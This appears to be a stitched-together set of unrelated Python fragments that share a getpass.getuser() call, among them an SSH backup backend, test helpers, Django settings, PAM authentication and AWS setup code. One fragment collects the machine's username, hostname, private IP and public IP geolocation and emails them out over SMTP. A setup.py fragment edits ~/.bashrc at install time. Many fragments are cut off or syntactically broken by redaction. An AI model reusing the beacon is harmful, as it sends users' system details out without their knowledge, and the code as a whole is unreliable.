cache_file = 'cache.pkl'

# fill in your gpu servers here
servers = [
    'gpuserver1',
    'gpuserver2',
]

# process filter
process_filter = re.compile(r'.*')


def update_config(file_path):
    global cache_file, process_filter, servers, update_interval
    import json
    with open(file_path, 'r') as f:
__status__ = "live"

import json
import socket
import getpass
from urllib.request import urlopen
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email import encoders
import datetime as dt

# USERNAME
username = getpass.getuser()
# HOSTNAME
hostname = socket.gethostname()
# PRIVATE IP
privateIP = socket.gethostbyname(hostname)
# PUBLIC IP, CITY, REGION, COUNTRY, GEO COORDINATES, POSTAL, TELECOM
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
del data['readme']  # don't need this

# CREATING EMAIL
fromaddr = "from_email_which_will_be_logged"  # Make sure it's allowed to log in from less secure apps. ex [email protected]
toaddr = "to_email_where_info_is_sent"  # ex [email protected]
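# The snippet above stops before the message is assembled. A minimal sketch of
# how the collected host data could be mailed with the imports already present;
# the SMTP relay, port, and credential below are placeholders for illustration,
# not values from the original script:
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = 'Host info for {0}@{1}'.format(username, hostname)
body = json.dumps(data, indent=2) + '\nprivate IP: ' + privateIP
msg.attach(MIMEText(body, 'plain'))

server = smtplib.SMTP('smtp.gmail.com', 587)  # assumed SMTP relay
server.starttls()
server.login(fromaddr, 'app-password-here')   # placeholder credential
server.sendmail(fromaddr, toaddr, msg.as_string())
server.quit()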
    def __init__(self, parsed_url):
        global paramiko
        duplicity.backend.Backend.__init__(self, parsed_url)

        self.retry_delay = 10

        if parsed_url.path:
            # remove first leading '/'
            self.remote_dir = re.sub(r'^/', r'', parsed_url.path, 1)
        else:
            self.remote_dir = u'.'

        # lazily import paramiko when we need it
        # debian squeeze's paramiko is a bit old, so we silence randompool
        # deprecation warning. note also: passphrased private keys work with
        # squeeze's paramiko only if done with DES, not AES
        import warnings
        warnings.simplefilter(u"ignore")
        try:
            import paramiko
        except ImportError:
            raise
        warnings.resetwarnings()

        class AgreedAddPolicy(paramiko.AutoAddPolicy):
            u"""
            Policy for showing a yes/no prompt and adding the hostname and new
            host key to the known host file accordingly.

            This class simply extends the AutoAddPolicy class with a yes/no prompt.
            """
            def missing_host_key(self, client, hostname, key):
                fp = hexlify(key.get_fingerprint())
                fingerprint = u':'.join(a + b for a, b in list(zip(fp[::2], fp[1::2])))
                question = u"""The authenticity of host '%s' can't be established.
%s key fingerprint is %s.
Are you sure you want to continue connecting (yes/no)? """ % (hostname, key.get_name().upper(), fingerprint)
                while True:
                    sys.stdout.write(question)
                    choice = input().lower()
                    if choice in [u'yes', u'y']:
                        paramiko.AutoAddPolicy.missing_host_key(self, client, hostname, key)
                        return
                    elif choice in [u'no', u'n']:
                        raise AuthenticityException(hostname)
                    else:
                        question = u"Please type 'yes' or 'no': "

        class AuthenticityException(paramiko.SSHException):
            def __init__(self, hostname):
                paramiko.SSHException.__init__(
                    self, u'Host key verification for server %s failed.' % hostname)

        self.client = paramiko.SSHClient()
        self.client.set_missing_host_key_policy(AgreedAddPolicy())

        # paramiko uses logging with the normal python severity levels,
        # but duplicity uses both custom levels and inverted logic...*sigh*
        self.client.set_log_channel(u"sshbackend")
        ours = paramiko.util.get_logger(u"sshbackend")
        dest = logging.StreamHandler(sys.stderr)
        dest.setFormatter(logging.Formatter(u'ssh: %(message)s'))
        ours.addHandler(dest)

        # ..and the duplicity levels are neither linear,
        # nor are the names compatible with python logging,
        # eg. 'NOTICE'...WAAAAAH!
        plevel = logging.getLogger(u"duplicity").getEffectiveLevel()
        if plevel <= 1:
            wanted = logging.DEBUG
        elif plevel <= 5:
            wanted = logging.INFO
        elif plevel <= 7:
            wanted = logging.WARNING
        elif plevel <= 9:
            wanted = logging.ERROR
        else:
            wanted = logging.CRITICAL
        ours.setLevel(wanted)

        # load known_hosts files
        # paramiko is very picky wrt format and bails out on any problem...
        try:
            if os.path.isfile(u"/etc/ssh/ssh_known_hosts"):
                self.client.load_system_host_keys(u"/etc/ssh/ssh_known_hosts")
        except Exception as e:
            raise BackendException(u"could not load /etc/ssh/ssh_known_hosts, "
                                   u"maybe corrupt?")
        try:
            # use load_host_keys() to signal it's writable to paramiko
            # load if file exists or add filename to create it if needed
            file = os.path.expanduser(u'~/.ssh/known_hosts')
            if os.path.isfile(file):
                self.client.load_host_keys(file)
            else:
                self.client._host_keys_filename = file
        except Exception as e:
            raise BackendException(u"could not load ~/.ssh/known_hosts, "
                                   u"maybe corrupt?")

        u"""
        the next block reorganizes all host parameters into a dictionary like
        SSHConfig does. this dictionary 'self.config' becomes the authoritative
        source for these values from here on. rationale is that it is easiest
        to deal wrt overwriting multiple values from ssh_config file. (ede 03/2012)
        """
        self.config = {u'hostname': parsed_url.hostname}
        # get system host config entries
        self.config.update(self.gethostconfig(u'/etc/ssh/ssh_config', parsed_url.hostname))
        # update with user's config file
        self.config.update(self.gethostconfig(u'~/.ssh/config', parsed_url.hostname))
        # update with url values
        # username from url
        if parsed_url.username:
            self.config.update({u'user': parsed_url.username})
        # username from input
        if u'user' not in self.config:
            self.config.update({u'user': getpass.getuser()})
        # port from url
        if parsed_url.port:
            self.config.update({u'port': parsed_url.port})
        # ensure there is a default 22 or an int value
        if u'port' in self.config:
            self.config.update({u'port': int(self.config[u'port'])})
        else:
            self.config.update({u'port': 22})
        # parse ssh options for alternative ssh private key, identity file
        m = re.search(r"^(?:.+\s+)?(?:-oIdentityFile=|-i\s+)(([\"'])([^\\2]+)\\2|[\S]+).*",
                      globals.ssh_options)
        if m is not None:
            keyfilename = m.group(3) if m.group(3) else m.group(1)
            self.config[u'identityfile'] = keyfilename
        # ensure ~ is expanded and identity exists in dictionary
        if u'identityfile' in self.config:
            if not isinstance(self.config[u'identityfile'], list):
                # Paramiko 1.9.0 and earlier do not support multiple
                # identity files when parsing config files and always
                # return a string; later versions always return a list,
                # even if there is only one file given.
                #
                # All recent versions seem to support *using* multiple
                # identity files, though, so to make things easier, we
                # simply always use a list.
                self.config[u'identityfile'] = [self.config[u'identityfile']]
            self.config[u'identityfile'] = [
                os.path.expanduser(i) for i in self.config[u'identityfile']]
        else:
            self.config[u'identityfile'] = None

        # get password, enable prompt if askpass is set
        self.use_getpass = globals.ssh_askpass
        # set url values for beautiful login prompt
        parsed_url.username = self.config[u'user']
        parsed_url.hostname = self.config[u'hostname']
        password = self.get_password()

        try:
            self.client.connect(hostname=self.config[u'hostname'],
                                port=self.config[u'port'],
                                username=self.config[u'user'],
                                password=password,
                                allow_agent=True,
                                look_for_keys=True,
                                key_filename=self.config[u'identityfile'])
        except Exception as e:
            raise BackendException(u"ssh connection to %s@%s:%d failed: %s" % (
                self.config[u'user'], self.config[u'hostname'], self.config[u'port'], e))
        self.client.get_transport().set_keepalive((int)(old_div(globals.timeout, 2)))

        self.scheme = duplicity.backend.strip_prefix(parsed_url.scheme, u'paramiko')
        self.use_scp = (self.scheme == u'scp')

        # scp or sftp?
        if self.use_scp:
            # sanity-check the directory name
            if re.search(u"'", self.remote_dir):
                raise BackendException(u"cannot handle directory names with single quotes with scp")
            # make directory if needed
            self.runremote(u"mkdir -p '%s'" % (self.remote_dir,), False, u"scp mkdir ")
        else:
            try:
                self.sftp = self.client.open_sftp()
            except Exception as e:
                raise BackendException(u"sftp negotiation failed: %s" % e)

            # move to the appropriate directory, possibly after creating it and its parents
            dirs = self.remote_dir.split(os.sep)
            if len(dirs) > 0:
                if not dirs[0]:
                    dirs = dirs[1:]
                    dirs[0] = u'/' + dirs[0]
                for d in dirs:
                    if d == u'':
                        continue
                    try:
                        attrs = self.sftp.stat(d)
                    except IOError as e:
                        if e.errno == errno.ENOENT:
                            try:
                                self.sftp.mkdir(d)
                            except Exception as e:
                                raise BackendException(u"sftp mkdir %s failed: %s" %
                                                       (self.sftp.normalize(u".") + u"/" + d, e))
                        else:
                            raise BackendException(u"sftp stat %s failed: %s" %
                                                   (self.sftp.normalize(u".") + u"/" + d, e))
                    try:
                        self.sftp.chdir(d)
                    except Exception as e:
                        raise BackendException(u"sftp chdir to %s failed: %s" %
                                               (self.sftp.normalize(u".") + u"/" + d, e))
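# gethostconfig() is called above but not shown in this excerpt. A plausible
# sketch of such a helper using paramiko's real SSHConfig API; this is an
# assumption about the missing method, not necessarily the backend's actual
# implementation:
def gethostconfig(self, file, host):
    import paramiko
    file = os.path.expanduser(file)
    if not os.path.isfile(file):
        return {}
    sshconfig = paramiko.SSHConfig()
    with open(file) as f:
        sshconfig.parse(f)
    return sshconfig.lookup(host)  # dict of ssh_config options for this host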
import os
import getpass

joinpath = os.path.join

USER = [getpass.getuser()]
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
os.chdir(BASE_PATH)
print(f'set base dir to {BASE_PATH}')

# saving models
RESULTS_PATH_ABS = joinpath(BASE_PATH, 'results')
if not os.path.exists(RESULTS_PATH_ABS):
    os.mkdir(RESULTS_PATH_ABS)
OVERVIEW_FILE_REL = 'overview.csv'
OVERVIEW_FILE_ABS = joinpath(RESULTS_PATH_ABS, OVERVIEW_FILE_REL)
    def _run_initscript(self, init_script, minions, minion_running, action, exitstatus=None, message=''):
        '''
        Wrapper that runs the initscript for the configured minions and
        verifies the results.
        '''
        user = getpass.getuser()
        ret = init_script.run(
            [action],
            catch_stderr=True,
            with_retcode=True,
            env={
                'SALTMINION_CONFIGS': '\n'.join([
                    '{0} {1}'.format(user, minion.abs_path(minion.config_dir))
                    for minion in minions
                ]),
            },
            timeout=90,
        )

        for line in ret[0]:
            log.debug('script: salt-minion: stdout: {0}'.format(line))
        for line in ret[1]:
            log.debug('script: salt-minion: stderr: {0}'.format(line))
        log.debug('exit status: {0}'.format(ret[2]))

        if six.PY3:
            std_out = b'\nSTDOUT:'.join(ret[0])
            std_err = b'\nSTDERR:'.join(ret[1])
        else:
            std_out = '\nSTDOUT:'.join(ret[0])
            std_err = '\nSTDERR:'.join(ret[1])

        # Check minion state
        for minion in minions:
            self.assertEqual(
                minion.is_running(),
                minion_running,
                'script action "{0}" should result in minion "{1}" {2} and is not.\nSTDOUT:{3}\nSTDERR:{4}'.format(
                    action,
                    minion.name,
                    ["stopped", "running"][minion_running],
                    std_out,
                    std_err,
                ))

        if exitstatus is not None:
            self.assertEqual(
                ret[2],
                exitstatus,
                'script action "{0}" {1} exited {2}, must be {3}\nSTDOUT:{4}\nSTDERR:{5}'.format(
                    action,
                    message,
                    ret[2],
                    exitstatus,
                    std_out,
                    std_err,
                ))
        return ret
def find_obs_date(obsid):
    """
    find the observation date for a given obsid.
    """
    #
    #--- check the current user; only mta and cus have a temp directory set up
    #    (the original wrote the temp file to ctemp_dir for cus but read it back
    #     from mtemp_dir; using one tdir variable fixes that)
    #
    user = getpass.getuser().strip()
    if user == 'mta':
        tdir = mtemp_dir
    elif user == 'cus':
        tdir = ctemp_dir
    else:
        print("the user is not mta or cus. Exiting")
        exit(1)

    cmd = 'lynx -source http://acis.mit.edu/cgi-bin/get-obsid?id=' + str(obsid) + ' > ' + tdir + 'ztemp'
    os.system(cmd)

    f = open(tdir + 'ztemp', 'r')
    data = [line.strip() for line in f.readlines()]
    f.close()

    cmd = 'rm ' + tdir + 'ztemp'
    os.system(cmd)

    date = ''
    chk = 0
    for ent in data:
        if chk == 1:
            atemp = re.split('\<tt\>', ent)
            btemp = re.split('\<', atemp[1])
            date = btemp[0]
            chk += 1
            break
        else:
            m = re.search('Start Date:', ent)
            if m is not None:
                chk = 1

    atemp = re.split('\s+|\t+', date)
    btemp = re.split('-', atemp[0])
    mon = tcnv.changeMonthFormat(int(btemp[1]))  #--- convert digit month to letter month
    #
    #--- change time format from 24 hr to 12 hr system
    #
    ctemp = re.split(':', atemp[1])
    part = 'AM'
    time = int(ctemp[0])
    if time >= 12:
        time -= 12
        part = 'PM'

    stime = str(time)
    if time < 10:
        stime = '0' + stime
    stime = stime + ':' + ctemp[1] + part

    date = mon + ' ' + btemp[2] + ' ' + btemp[0] + ' ' + stime

    return date
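# The lynx shell-out above could instead be a plain urllib fetch, which avoids
# the temp file and the per-user directory handling entirely. A hedged sketch
# of that substitution (same endpoint, same line-by-line parsing assumed):
def fetch_obsid_page(obsid):
    from urllib.request import urlopen
    url = 'http://acis.mit.edu/cgi-bin/get-obsid?id=%s' % obsid
    with urlopen(url) as resp:
        # return stripped lines, mirroring the readlines() loop above
        return [l.strip() for l in resp.read().decode('utf-8', 'replace').splitlines()]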
              name=AURORA_EXECUTOR_NAME,
              data=thermos_config.json_dumps()),
          job=JobKey(role=role, environment='env', name='name'),
          owner=Identity(role=role, user=role)),
      assignedPorts=assigned_ports,
      **kw)
  td = mesos_pb2.TaskInfo()
  td.task_id.value = task_id
  td.name = thermos_config.task().name().get()
  td.data = serialize(at)
  return td


BASE_MTI = MesosTaskInstance(instance=0, role=getpass.getuser())
BASE_TASK = Task(resources=Resources(cpu=1.0, ram=16 * MB, disk=32 * MB))

HELLO_WORLD_TASK_ID = 'hello_world-001'
HELLO_WORLD = BASE_TASK(
    name='hello_world',
    processes=[Process(name='hello_world_{{thermos.task_id}}', cmdline='echo hello world')])
HELLO_WORLD_MTI = BASE_MTI(task=HELLO_WORLD)

SLEEP60 = BASE_TASK(processes=[Process(name='sleep60', cmdline='sleep 60')])
SLEEP2 = BASE_TASK(processes=[Process(name='sleep2', cmdline='sleep 2')])
SLEEP60_MTI = BASE_MTI(task=SLEEP60)

MESOS_JOB = MesosJob(
# Standard library
import getpass

# Third-party packages
import pyglet
from pyglet.resource import get_settings_path

# Modules from this project
# Nothing for now...

APP_NAME = 'pyCraft'  # should I stay or should I go?
APP_VERSION = 0.1

DEBUG = False
LOG_DEBUG, LOG_INFO, LOG_WARNING, LOG_ERROR, LOG_FATAL = range(5)
LOG_LEVEL = LOG_INFO

IP_ADDRESS = "neb.nebtown.info"  # The IP Address to connect to
USERNAME = getpass.getuser()  # Default to system username
CLIENT = None  # Becomes the instance of PacketReceiver if running the client
SERVER = None  # Becomes the instance of Server if running the server

# Game modes
SURVIVAL_MODE = 'survival'
CREATIVE_MODE = 'creative'
GAME_MODE_CHOICES = (SURVIVAL_MODE, CREATIVE_MODE)
GAME_MODE = CREATIVE_MODE
SINGLEPLAYER = False

# User input
# Movement
MOVE_FORWARD_KEY = 'W'
    ip = os.popen("ifconfig $(netstat -rn | awk '/^default[[:space:]]/ {print $6}') | sed -n '4 s/.*inet //; 4 s/ .*// p'").read().rstrip('\n')  # pylint: disable=line-too-long
else:
    warn('OS is not Linux or Mac, IP detection will not work')

if not isIP(ip):
    warn('defaulting IP to %s' % default_ip)
    ip = default_ip

ipython_profile_name = "pyspark"

###########################

template = Template(open(template_file).read())

password = "******"
password2 = "2"

if getpass.getuser() == 'root':
    print("please run this as your regular user account and not root!")
    sys.exit(1)


def get_password():
    global password
    global password2
    # (prompt strings redacted in the source)
    #password = raw_input("Enter password to protect your personal IPython NoteBook\n\npassword: "******"confirm password: "******
    print("\nEnter a password to protect your personal IPython NoteBook (sha1 hashed and written to a config file)\n")
    password = getpass.getpass()
    password2 = getpass.getpass("Confirm Password: ")
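# The prompt above says the password is sha1 hashed into a config file. A
# sketch of the classic 'sha1:salt:digest' form used by older IPython notebook
# configs; the 12-hex-digit salt length is an assumption for illustration:
def hash_password(plaintext):
    import hashlib
    import random
    salt = '%012x' % random.getrandbits(48)
    digest = hashlib.sha1((plaintext + salt).encode('utf-8')).hexdigest()
    return 'sha1:%s:%s' % (salt, digest)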
    def load(self, profile='default', rootpath=None, reload=True, parameters=None):
        """
        Performs the following steps:
            - set rootpath for the given project
            - import variables from <rootpath>/.env (if present)
            - load the `profile` from the metadata files
            - setup and start the data engine

        :param profile: load the given metadata profile (default: 'default')
        :param rootpath: root directory for the loaded project.
            Default behaviour: search parent dirs to detect the root dir by
            looking for a '__main__.py' or 'main.ipynb' file. When such a file
            is found, the corresponding directory is the root path for the
            project. If nothing is found, the current working directory will
            be the rootpath.
        :param reload: if set to False, prevents reloading a new profile
        :param parameters: optional dict, available as metadata variables
        :return: None

        Notes about metadata configuration:

        1) Metadata files are merged up, so you can split the information in
           multiple files as long as they end with `metadata.yml`. For example:
           `metadata.yml`, `abc.metadata.yaml`, `abc_metadata.yml` are all
           valid metadata file names.

        2) All metadata files in all subdirectories from the project root
           directory are loaded, unless the directory contains a file
           `metadata.ignore.yml`.

        3) Metadata files can provide multiple profile configurations, by
           separating each profile configuration with a Document Marker
           (a line with `---`) (see https://yaml.org/spec/1.2/spec.html#YAML).

        4) Each metadata profile can be broken down in multiple yaml files.
           When loading the files, all configuration belonging to the same
           profile will be merged.

        5) All metadata profiles inherit the settings from profile 'default'.

        (A sketch of this merge rule follows the method below.)

        Metadata files are composed of 6 sections:
            - profile
            - variables
            - providers
            - resources
            - engine
            - logging

        For more information about metadata configuration,
        type `help(datafaucet.project.metadata)`
        """
        if self.loaded and not self._reload:
            logging.notice(
                f"Profile '{self._profile}' already loaded with option 'reload=False': "
                "skipping project.load()")
            return self

        # set rootpath
        paths.set_rootdir(rootpath)

        # set loaded to false
        self.loaded = False

        # get currently running script path
        self._script_path = files.get_script_path(paths.rootdir())

        # set dotenv default file, check the file exists
        self._dotenv_path = files.get_dotenv_path(paths.rootdir())

        # get files
        self._metadata_files = files.get_metadata_files(paths.rootdir())
        self._notebook_files = files.get_jupyter_notebook_files(paths.rootdir())
        self._python_files = files.get_python_files(paths.rootdir())

        # metadata defaults
        dir_path = os.path.dirname(os.path.realpath(__file__))
        default_md_files = [os.path.join(dir_path, 'schemas/default.yml')]
        project_md_files = abspath(self._metadata_files, paths.rootdir())

        # load metadata
        try:
            md_paths = default_md_files + project_md_files
            dotenv_path = abspath(self._dotenv_path, paths.rootdir())
            metadata.load(profile, md_paths, dotenv_path, parameters=parameters)
        except ValueError as e:
            print(e)

        # bail if no metadata
        if metadata.profile is None:
            raise ValueError('No valid metadata to load.')

        # set username
        self._username = getpass.getuser()

        # get repo data
        self._repo = git.repo_data()

        # set profile from metadata
        self._profile = metadata.info()['active']

        # set session name
        name_parts = [self._profile, self._repo.get('name')]
        self._session_name = '-'.join([x for x in name_parts if x])

        # set session id
        self._session_id = hex(uuid.uuid1().int >> 64)

        # initialize logging
        log_config = metadata.profile('logging')
        logging.init(log_config['level'], log_config['stdout'],
                     log_config['file'], log_config['kafka'],
                     self._session_id)

        # add rootpath to the list of python sys paths
        if paths.rootdir() not in sys.path:
            sys.path.append(paths.rootdir())

        # stop existing engine
        if self._engine:
            self._engine.stop()

        # services
        services = dict()
        all_aliases = list(metadata.profile()['providers'].keys())

        # get services from aliases
        for alias in all_aliases:
            r = Resource(alias)
            services[r['service']] = r

        # get one service from each type to
        # load drivers, jars etc via the engine init
        services = list(services.values())

        # initialize the engine
        md = metadata.profile()['engine']
        engines.Engine(
            md['type'],
            session_name=self._session_name,
            session_id=self._session_id,
            master=md['master'],
            timezone=md['timezone'],
            jars=md['jars'],
            packages=md['packages'],
            files=md['files'],
            repositories=md['repositories'],
            services=services,
            conf=md['conf'],
            detect=md['detect'])

        # set loaded to True
        self.loaded = True
        self._reload = reload

        # return object
        return self
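# The docstring above describes profiles separated by '---' document markers,
# each inheriting from 'default'. A tiny self-contained sketch of that merge
# rule (PyYAML assumed; this mimics, rather than calls, datafaucet's loader):
import yaml

text = """
profile: default
engine_type: spark
timezone: UTC
---
profile: prod
engine_master: yarn
"""

profiles = {}
for doc in yaml.safe_load_all(text):
    name = doc.get('profile', 'default')
    merged = dict(profiles.get('default', {}))  # every profile inherits 'default'
    merged.update(doc)
    profiles[name] = merged

# 'prod' keeps engine_type and timezone from 'default', plus its own engine_master
print(profiles['prod'])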
    def initialHierarchy(self):
        self.plog.log("Build initial hierarchy")

        # --------------------------------------------------
        # Model
        self.model = xsi.ActiveSceneRoot.AddModel(None, self.options["rigName"])
        self.model.Properties("visibility").Parameters("viewvis").Value = False

        # --------------------------------------------------
        # Global Ctl
        if "global_C0_ctl" in self.guide.controlers.keys():
            self.global_ctl = self.guide.controlers["global_C0_ctl"].create(
                self.model, "global_C0_ctl", XSIMath.CreateTransform(), self.options["C_color_fk"])
        else:
            self.global_ctl = icon.crossarrow(self.model, "global_C0_ctl", 10, self.options["C_color_fk"])
        par.setKeyableParameters(self.global_ctl,
                                 ["posx", "posy", "posz", "rotx", "roty", "rotz", "rotorder"])
        self.addToGroup(self.global_ctl, "controlers_01")

        # --------------------------------------------------
        # INFOS
        self.info_prop = self.model.AddProperty("gear_PSet", False, "info")

        pRigName = self.info_prop.AddParameter3("rig_name", c.siString, self.options["rigName"], None, None, False, True)
        pUser = self.info_prop.AddParameter3("user", c.siString, getpass.getuser(), None, None, False, True)
        pIsWip = self.info_prop.AddParameter3("isWip", c.siBool, self.options["mode"] != 0, None, None, False, True)
        pDate = self.info_prop.AddParameter3("date", c.siString, datetime.datetime.now(), None, None, False, True)
        pXSIVersion = self.info_prop.AddParameter3("xsi_version", c.siString, xsi.Version(), None, None, False, True)
        pGEARVersion = self.info_prop.AddParameter3("gear_version", c.siString, gear.getVersion(), None, None, False, True)
        pSynoptic = self.info_prop.AddParameter3("synoptic", c.siString, self.options["synoptic"], None, None, False, False)
        pComments = self.info_prop.AddParameter3("comments", c.siString, self.options["comments"], None, None, False, True)
        pComponentsGrid = self.info_prop.AddGridParameter("componentsGrid")

        self.components_grid = pComponentsGrid.Value
        self.components_grid.ColumnCount = 4
        self.components_grid.SetColumnLabel(0, "Name")
        self.components_grid.SetColumnLabel(1, "Type")
        self.components_grid.SetColumnLabel(2, "Version")
        self.components_grid.SetColumnLabel(3, "Author")

        self.info_layout = ppg.PPGLayout()
        self.info_mainTab = self.info_layout.addTab("Main")

        group = self.info_mainTab.addGroup("Main")
        group.addItem(pRigName.ScriptName, "Name")
        group.addItem(pUser.ScriptName, "User")
        group.addItem(pIsWip.ScriptName, "Is Wip")
        group.addItem(pDate.ScriptName, "Date")
        group.addItem(pXSIVersion.ScriptName, "XSI Version")
        group.addItem(pGEARVersion.ScriptName, "GEAR Version")

        group = self.info_mainTab.addGroup("Synoptic")
        item = group.addItem(pSynoptic.ScriptName, "Synoptic")
        item.setAttribute(c.siUINoLabel, True)

        group = self.info_mainTab.addGroup("Comments")
        item = group.addString(pComments.ScriptName, "", True, 120)
        item.setAttribute(c.siUINoLabel, True)

        self.info_componentTab = self.info_layout.addTab("Components")
        group = self.info_componentTab.addGroup("GEAR")
        group.addItem(pGEARVersion.ScriptName, "Version")
        group = self.info_componentTab.addGroup("Components")
        item = group.addItem(pComponentsGrid.ScriptName, "", c.siControlGrid)
        item.setAttribute(c.siUINoLabel, True)

        self.info_prop.Parameters("layout").Value = self.info_layout.getValue()

        # --------------------------------------------------
        # UI SETUP AND ANIM
        self.ui = UIHost(self.global_ctl)

        # Setup_Ctrl
        self.setup_mainTab = self.ui.setup_layout.addTab("Main")

        # Anim_Ctrl
        self.anim_mainTab = self.ui.anim_layout.addTab("Main")

        self.pRigScale = self.ui.anim_prop.AddParameter2(
            "rigScale", c.siDouble, 1, 0.001, None, .001, 3,
            c.siClassifUnknown, c.siAnimatable | c.siKeyable)
        self.pOGLLevel = self.ui.anim_prop.AddParameter3("oglLevel", c.siInt4, 0, 0, 2, False, False)
        self.pResolutions = self.ui.anim_prop.AddParameter3("resolutions", c.siInt4, 0, 0, None, False, False)

        group = self.anim_mainTab.addGroup("Animate")
        group.addItem(self.pRigScale.ScriptName, "Global Scale")
        group = self.anim_mainTab.addGroup("Performance")
        #group.addEnumControl(self.pResolutions.ScriptName, ["default", 0], "Resolutions", c.siControlCombo)
        group.addItem(self.pOGLLevel.ScriptName, "OGL Level")

        # scale expression
        for s in "xyz":
            par.addExpression(self.global_ctl.Kinematics.Local.Parameters("scl" + s), self.pRigScale)

        # --------------------------------------------------
        # Basic set of null
        if self.options["shadowRig"]:
            self.shd_org = self.model.AddNull("shd_org")
            self.addToGroup(self.shd_org, "hidden")
            ],
        },
    },
]

WSGI_APPLICATION = 'example_project.wsgi.application'

DATABASES = {
    # Configure by setting the DATABASE_URL environment variable.
    # The default settings may work well for local development.
    'default': dj_database_url.config() or {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'hordak',
        'HOST': '127.0.0.1',
        'PORT': '5432',
        'USER': getpass.getuser(),
        'PASSWORD': '',
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
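# dj_database_url.config() reads the DATABASE_URL environment variable, so the
# hardcoded fallback above only applies when it is unset. A usage sketch (the
# URL values are placeholders):
#
#   export DATABASE_URL=postgres://myuser:mypass@db.example.com:5432/hordak
#
# or, parsing a URL directly into Django settings form:
import dj_database_url
db_settings = dj_database_url.parse('postgres://myuser:mypass@localhost:5432/hordak')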
try:
    # Request needed info from command line.
    host = input_stuff("Source database host address (default is localhost):", "localhost")
    logger.log("Source host name %s" % host, 0)

    # dbname = input_stuff(
    #     "Database name (Name of database on host):"
    #     ,"pyjunk")
    # logger.log("Database name %s" % dbname, 0)

    user = input_stuff(
        "Database role (username - leave blank if same as your current user):",
        getpass.getuser())
    logger.log("Username %s" % user, 0)

    # Obviously, don't log the role password in the log
    # (the prompt string and the dbname assignment are redacted in the source)
    password = getpass.getpass("Role password:"******"_qstemplate"

    databases = get_DB_list(dbname, user, password, host)
    for database in databases:
        if database[0] not in ('postgres', 'template0', 'template1'):
            conn = create_connection(database[0], user, password, host)
            get_activities(database[0], conn)
            get_campaigns(database[0], conn)
            close_connection(conn)
######################################################################
#                               SETUP                                #
######################################################################
from setuptools import setup, find_packages
from getpass import getuser
import os
from sys import platform

user = getuser()


def run():
    if platform == 'linux':
        # append the user's local bin directory to PATH
        # (quoting fixed so the exported value survives the shell echo)
        os.system(f'echo \'export PATH="/home/{user}/.local/bin:$PATH"\' >> ~/.bashrc')


run()

setup(
    name='electric',
    version='1.0.0',
    description='The Official Package Manager For Windows, MacOS and Linux!',
    url="https://github.com/TheBossProSniper/Electric",
    author='TheBossProSniper',
    author_email='*****@*****.**',
    py_modules=['electric'],
    packages=find_packages(),
    scripts=[os.path.join(os.path.abspath(os.getcwd()), 'src', 'electric.py')],
    install_requires=[
from subprocess import call

import zipfile
import boto3
import botocore
import time
import json
import webbrowser
import hashlib
import getpass

from botocore.exceptions import ClientError
from botocore.exceptions import ProfileNotFound
from parlai.mturk.core.data_model import setup_database_engine, init_database, check_database_health

aws_profile_name = 'parlai_mturk'
region_name = 'us-east-1'
user_name = getpass.getuser()

iam_role_name = 'parlai_relay_server'
lambda_function_name = 'parlai_relay_server_' + user_name
lambda_permission_statement_id = 'lambda-permission-statement-id'
api_gateway_name = 'ParlaiRelayServer_' + user_name
endpoint_api_name_html = 'html'  # For GET-ing HTML
endpoint_api_name_json = 'json'  # For GET-ing and POST-ing JSON

rds_db_instance_identifier = 'parlai-mturk-db-' + user_name
rds_db_name = 'parlai_mturk_db_' + user_name
rds_username = '******'
rds_password = '******'
rds_security_group_name = 'parlai-mturk-db-security-group'
rds_security_group_description = 'Security group for ParlAI MTurk DB'
rds_db_instance_class = 'db.t2.medium'
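# A minimal sketch of how the profile/region constants above would typically be
# consumed with boto3; the client call is illustrative, not ParlAI's actual
# setup code:
def get_rds_client():
    session = boto3.Session(profile_name=aws_profile_name, region_name=region_name)
    return session.client('rds')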
        p_response[0] = cast(addr, POINTER(PamResponse))
        for i in range(n_messages):
            if messages[i].contents.msg_style == PAM_PROMPT_ECHO_OFF:
                pw_copy = STRDUP(str(password))
                p_response.contents[i].resp = cast(pw_copy, c_char_p)
                p_response.contents[i].resp_retcode = 0
        return 0

    handle = PamHandle()
    conv = PamConv(my_conv, 0)
    retval = PAM_START(service, username, pointer(conv), pointer(handle))

    if retval != 0:
        # TODO: This is not an authentication error, something
        # has gone wrong starting up PAM
        return False

    retval = PAM_AUTHENTICATE(handle, 0)

    if retval == 0 and enable_acct_mgrt:
        retval = PAM_ACCT_MGMT(handle, 0)

    PAM_END(handle, retval)
    return retval == 0


if __name__ == "__main__":
    import getpass
    print(authenticate(getpass.getuser(), getpass.getpass()))
# OmniDB User Folder
DESKTOP_MODE = False

if DEV_MODE:
    HOME_DIR = BASE_DIR
elif DESKTOP_MODE:
    HOME_DIR = os.path.join(os.path.expanduser('~'), '.omnidb', 'omnidb-app')
else:
    HOME_DIR = os.path.join(os.path.expanduser('~'), '.omnidb', 'omnidb-server')

if not os.path.exists(HOME_DIR):
    os.makedirs(HOME_DIR)

CHAT_FOLDER = os.path.join(HOME_DIR, 'chat')
if not os.path.exists(CHAT_FOLDER):
    os.makedirs(CHAT_FOLDER)

try:
    os.symlink(CHAT_FOLDER,
               os.path.join(BASE_DIR, 'OmniDB_app/static', 'chat-{0}'.format(getpass.getuser())))
except Exception:
    # the symlink already exists or cannot be created; the static link below still works
    pass

CHAT_LINK = '/static/chat-{0}'.format(getpass.getuser())

LOG_DIR = HOME_DIR
SESSION_DATABASE = os.path.join(HOME_DIR, 'db.sqlite3')

if not os.path.exists(SESSION_DATABASE):
    shutil.copyfile(os.path.join(BASE_DIR, 'db.sqlite3'), SESSION_DATABASE)

CONFFILE = os.path.join(HOME_DIR, 'omnidb.conf')
if not DEV_MODE and not os.path.exists(CONFFILE):
    shutil.copyfile(os.path.join(BASE_DIR, 'omnidb.conf'), CONFFILE)

OMNIDB_DATABASE = os.path.join(HOME_DIR, 'omnidb.db')

# Quick-start development settings - unsuitable for production
